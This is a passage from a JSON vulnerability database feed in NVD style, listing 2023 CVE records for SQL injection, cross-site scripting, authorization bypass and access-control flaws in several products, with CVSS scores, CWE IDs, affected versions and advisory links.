1.3."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-552"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-552"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:saysis:starcities:*:*:*:*:*:*:*:*","versionEndIncluding":"1.3","matchCriteriaId":"3FCCB7DB-20F6-4DB0-AF7A-C6A5A28C364E"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0140","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0140","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0140","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-0322","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-15T12:15:10.007","lastModified":"2026-06-01T13:16:19.360","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Talent Software UNIS allows Reflected XSS.\n\nThis issue affects UNIS: before 28376."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:talentyazilim:unis:*:*:*:*:*:*:*:*","versionEndExcluding":"28376","matchCriteriaId":"ACFE0227-4ED1-46E2-8B33-34F003250664"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0147","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0147","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory","US Government Resource"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0147","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory","US Government Resource"]}]}},{"cve":{"id":"CVE-2023-1152","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-17T09:15:12.533","lastModified":"2026-06-01T13:16:21.280","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Utarit Information Technologies Persolus allows SQL Injection. This issue affects Persolus: before 2.03.93."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:utarit:persolus:*:*:*:*:*:*:*:*","versionEndExcluding":"2.03.93","matchCriteriaId":"006D7605-817A-4E41-A8AF-AF2DD1CCFB46"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0154-2","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0154-2","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0154-2","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-0320","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-20T13:15:11.693","lastModified":"2026-06-01T13:16:18.223","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Izmir Katip Celebi University UBYS allows Stored XSS.\n\nThis issue affects UBYS: before 23.03.16."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":2.7},{"source":"nvd@nist.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":2.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]},{"source":"nvd@nist.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:university_information_management_system_project:university_information_management_system:*:*:*:*:*:*:*:*","versionEndExcluding":"23.03.16","matchCriteriaId":"82D43CAB-4461-4678-905B-B862DA779292"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0159","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0159","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0159","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1462","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-21T09:15:10.497","lastModified":"2026-06-01T13:16:22.353","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Authorization Bypass Through User-Controlled Key vulnerability in Vadi Corporate Information Systems DigiKent allows Authentication Bypass, Authentication Abuse. This issue affects DigiKent: before 23.03.20."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-639"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-639"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vadi:digikent:*:*:*:*:*:*:*:*","versionEndExcluding":"23.03.20","matchCriteriaId":"02BD5BAD-8FAD-4402-A594-EAB89DF78A96"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0161","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0161","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0161","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1153","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-21T12:15:10.117","lastModified":"2026-06-01T13:16:21.487","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Pacsrapor allows SQL Injection, Command Line Execution through SQL Injection.\n\nThis issue affects Pacsrapor: before 1.22."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:pacsrapor:pacsrapor:*:*:*:*:*:*:*:*","versionEndExcluding":"1.22","matchCriteriaId":"F9D6E36C-D132-41AF-AB5B-067EC31D7E88"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0163","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0163","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0163","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1154","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-21T12:15:10.407","lastModified":"2026-06-01T13:16:21.620","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pacsrapor allows Reflected XSS.\n\nThis issue affects Pacsrapor: before 1.22."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:pacsrapor:pacsrapor:*:*:*:*:*:*:*:*","versionEndExcluding":"1.22","matchCriteriaId":"F9D6E36C-D132-41AF-AB5B-067EC31D7E88"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0163","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0163","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0163","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1050","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-23T07:15:11.880","lastModified":"2026-06-01T13:16:20.540","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in As Koc Energy Web Report System allows SQL Injection.\n\nThis issue affects Web Report System: before 23.03.10."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:askoc:web_report_system:*:*:*:*:*:*:*:*","versionEndExcluding":"23.03.10","matchCriteriaId":"703BE6D4-079F-4D39-BDF0-E25734DB5100"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0166","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0166","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0166","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1051","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-23T07:15:12.787","lastModified":"2026-06-01T13:16:20.670","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in As Koc Energy Web Report System allows Reflected XSS.\n\nThis issue affects Web Report System: before 23.03.10."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7},{"source":"nvd@nist.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]},{"source":"nvd@nist.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:askoc:web_report_system:*:*:*:*:*:*:*:*","versionEndExcluding":"23.03.10","matchCriteriaId":"703BE6D4-079F-4D39-BDF0-E25734DB5100"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0166","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0166","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0166","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1013","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-30T09:15:10.317","lastModified":"2026-06-01T13:16:20.293","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Virames Vira-Investing allows Cross-Site Scripting (XSS).\n\nThis issue affects Vira-Investing: before 1.0.84.86."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-80"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:dizayn:vira-investing:*:*:*:*:*:*:*:*","versionEndExcluding":"1.0.84.86","matchCriteriaId":"92C947C7-4AE8-40D8-BCA9-992CAE070BAE"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0183","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0183","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0183","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1014","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-30T09:15:10.440","lastModified":"2026-06-01T13:16:20.427","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Protection for Outbound Error Messages and Alert Signals vulnerability in Virames Vira-Investing allows Account Footprinting.\n\nThis issue affects Vira-Investing: before 1.0.84.86."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-1320"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:dizayn:vira-investing:*:*:*:*:*:*:*:*","versionEndExcluding":"1.0.84.86","matchCriteriaId":"92C947C7-4AE8-40D8-BCA9-992CAE070BAE"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0183","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0183","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0183","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1060","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-31T10:15:06.660","lastModified":"2026-06-01T13:16:20.790","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in YKM YKM CRM allows Reflected XSS.\n\nThis issue affects YKM CRM: before 23.03.30."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:ykmbilisim:ykm_crm:*:*:*:*:*:*:*:*","versionEndExcluding":"23.03.30","matchCriteriaId":"310BEB7A-1613-4463-B4A8-E8EB23698BFD"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0189","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0189","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0189","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-23445","sourceIdentifier":"psirt@sick.de","published":"2023-05-15T11:15:09.087","lastModified":"2026-06-01T13:16:22.717","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Access Control in SICK FTMg AIR FLOW SENSOR with Partnumbers\n1100214, 1100215, 1100216, 1120114, 1120116, 1122524, 1122526 allows an unprivileged remote\nattacker to gain unauthorized access to data fields by using a therefore unpriviledged account via the\nREST interface."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-284"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd20axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E3882685-8678-47E4-995C-C3F6D9AD5668"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd20axx:-:*:*:*:*:*:*:*","matchCriteriaId":"16AD808F-900B-41EE-B90A-F9D67AAAD6BE"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd25axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"49D930E8-415C-4183-87A1-8D7F44247B67"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd25axx:-:*:*:*:*:*:*:*","matchCriteriaId":"24618A95-328C-47C9-B8EF-B4DF6E65D68E"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"1DCC9C0B-7CCE-44E5-B25D-67BF971B4541"}]},{"operator":"OR","n